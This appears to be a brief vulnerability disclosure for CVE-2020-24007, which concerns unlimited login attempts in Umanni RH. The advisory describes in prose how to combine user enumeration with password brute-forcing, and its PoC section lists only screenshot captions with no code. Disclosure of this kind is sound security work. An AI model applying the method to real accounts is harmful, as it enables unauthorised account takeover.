CVE-2020-24007
Brute Force on Umanni RH
Description
Umanni RH does not limit the number of authentication attempts. An unauthenticated user may exploit this vulnerability to launch a brute-force authentication attack against the Login page.
Exploitation
To exploit this vulnerability, it is necessary using the user enumeration vulnerability in Password Recovery to enumerate the valid users and after could perform an arbitrary number of authentication attempts using different passwords, and eventually gain access to the targeted account.
PoC
- Login Page
- Brute Force Login - Invalid Password
- Brute Force Login - Valid Password (Redirect)
- Brute Force Login - Valid Password (Redirect)
- Brute Force Login - Valid Password




